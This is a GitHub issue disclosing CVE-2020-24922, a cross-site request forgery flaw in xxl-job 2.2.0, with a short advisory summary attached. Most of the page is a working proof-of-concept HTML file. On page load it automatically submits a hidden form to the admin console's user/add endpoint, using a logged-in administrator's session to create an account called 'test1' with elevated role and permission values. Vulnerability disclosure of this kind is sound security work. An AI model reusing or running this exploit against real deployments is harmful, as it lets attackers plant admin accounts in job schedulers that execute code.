CVE-2020-24922: There is a CSRF vulnerability that can add the administrator account · Issue #1921 · xuxueli/xxl-job

Cross Site Request Forgery (CSRF) vulnerability in xxl-job-admin/user/add in xuxueli xxl-job version 2.2.0 allows remote attackers to execute arbitrary code and escalate privileges via a crafted .html file.


devi1syd opened this issue on Aug 22, 2020 · 0 comments (status: Open)

After the administrator has logged in, open the following page.
PoC:
one.html — adds an admin

<html><body>
<script type="text/javascript">
// Build a hidden form carrying the given fields and submit it to url
// in the current window, so the browser attaches the victim's session cookie.
function post(url, fields)
{
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
}
function csrf_hack()
{
    // Start from an empty string; an uninitialised var would prepend "undefined".
    var fields = "";

    fields += "<input type='hidden' name='username' value='test1' />";
    fields += "<input type='hidden' name='password' value='test1' />";
    fields += "<input type='hidden' name='role'    value='0' />";
    fields += "<input type='hidden' name='permission' value='1' />";

    // Target: the user/add action of the xxl-job admin console (host as in the report).
    var url = "http://172.18.71.41:8090/xxl-job-admin/user/add";
    post(url, fields);
}
window.onload = function() { csrf_hack(); }
</script>
</body></html>


Related news

GHSA-jp5r-4x9q-4vcf: xuxueli xxl-job Cross-Site Request Forgery Vulnerability

Cross Site Request Forgery (CSRF) vulnerability in `xxl-job-admin/user/add` in xuxueli xxl-job version 2.2.0 allows remote attackers to execute arbitrary code and escalate privileges via a crafted .html file.
